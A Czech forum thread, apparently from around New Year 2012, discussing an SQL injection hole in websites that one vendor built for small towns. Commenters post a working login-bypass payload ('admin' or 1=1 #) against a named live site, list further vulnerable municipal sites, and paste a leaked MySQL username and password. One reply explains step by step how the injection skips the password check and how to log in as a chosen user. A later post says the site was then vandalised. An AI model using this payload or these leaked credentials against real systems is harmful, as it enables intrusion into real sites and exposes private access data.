| url: [link]
user: admin' or 1=1 #
pass: whatever
Další věci jsem nezkoumal - admin for free stačí ..
(odpovědět) | |
|
|
| hm tak on ten bug je snad ve vsem od ty radoby firmy ..
namatkou treba
[link]
www.postoloprty.cz
...
njn to nez opravej ..
(odpovědět) | |
|
|
| mysql admin
//uzivatel 'redsys_turnov'
//heslo 'rd2x69
Ze souboru [link]
(odpovědět) | | Koala | 62.220.135.* | 31.12.2011 2:17 |
|
|
|
| ten spravce souboru zobrazi i phpskripty ? :D
tak to je moc ... neco takovyho sem ani uz nepredpokladal ..
(odpovědět) | |
|
|
| Vzhledem k tomu, ze vetsina mestecek a obci co to ma od tyhle firmy [link] maj asi ten samej bug, tak se divim, ze se to jeste neprovalilo ..
(odpovědět) | |
|
|
|
| Kiddie: Zajímalo by mě, jak si přišel na to, že před ' or 1=1 # musí být admin a heslo zrovna whatever?
----------
Spravedlnost bez síly je marnost, ale síla bez spravedlnosti je zločin.
(odpovědět) | |
|
|
| Jednoduše:
Hoď do loginu apostrof a odešli. Získáš následující chybu:
Error in query: SELECT * FROM users WHERE us_login=''' and us_heslo='d41d8cd98f00b204e9800998ecf8427e' and us_aktivita='A'.
Když tam teď přihodíš to, co vložil Kiddie, získáš následující dotaz:
SELECT * FROM users WHERE us_login='admin' or 1=1#' and us_heslo='d41d8cd98f00b204e9800998ecf8427e' and us_aktivita='A'.
Komentář způsobí, že bude vypuštěna část kontrolující heslo a získáš vlastně dotaz:
SELECT * FROM users WHERE us_login='admin' or 1=1#
Tím pádem je jasné, že heslo můžeš zadat libovolné.
Co se týká loginu: Pokud se podíváš na tu podmínku:
'admin' or 1=1
ta bude vždy vyhodnocena jako pravda, bez ohledu na to, zda se v databázi login admin nachází nebo ne. Kouzlo ale tkví v tom, že budeš přihlášen na první login, který se v DB nachází. Klidně tam tedy můžeš vložit pouze
' or 1=1#
a výsledek bude stejný. Pokud by ses chtěl lognout na konkrétní login (dejme tomu RubberDuck), vložíš do loginu
RubberDuck'#
Pokud se v databázi bude nacházet login RubberDuck, budeš na něj přihlášen.
Jednoduše řečeno: Jedná se pouze a jen o hrátky s logikou a logickými operátory.
----------
Sec-Cave.cz - [link]
(odpovědět) | |
|
|
| jj .. prostě logická konstrukce dotazu. Admin je tam kvuli tomu, ze predpokládám, že tam account admin je, pokud ne tak nevadí.
Jsem sice scriptKiddie, věnuju se vývoji, ne destrukci. Ale chyba odhalena, přidána demonstrace .. poslána zpráva pro správce napadnutelných stránek a výsměvná zpráva firmě, co to psala .. pro mě job done
(odpovědět) | |
|
|
|
| HM, koukám že to tam někdo hodně zpankoval .. tady něco tak příště nahlásit .. táhnšte do prdele fakani (nemyšleno globálně)
(odpovědět) | |
|
|
| To se dalo čekat, někdo si potřeboval zvýšit ego.
(odpovědět) | | mk | 217.16.178.* | 1.1.2012 20:49 |
|
|
|
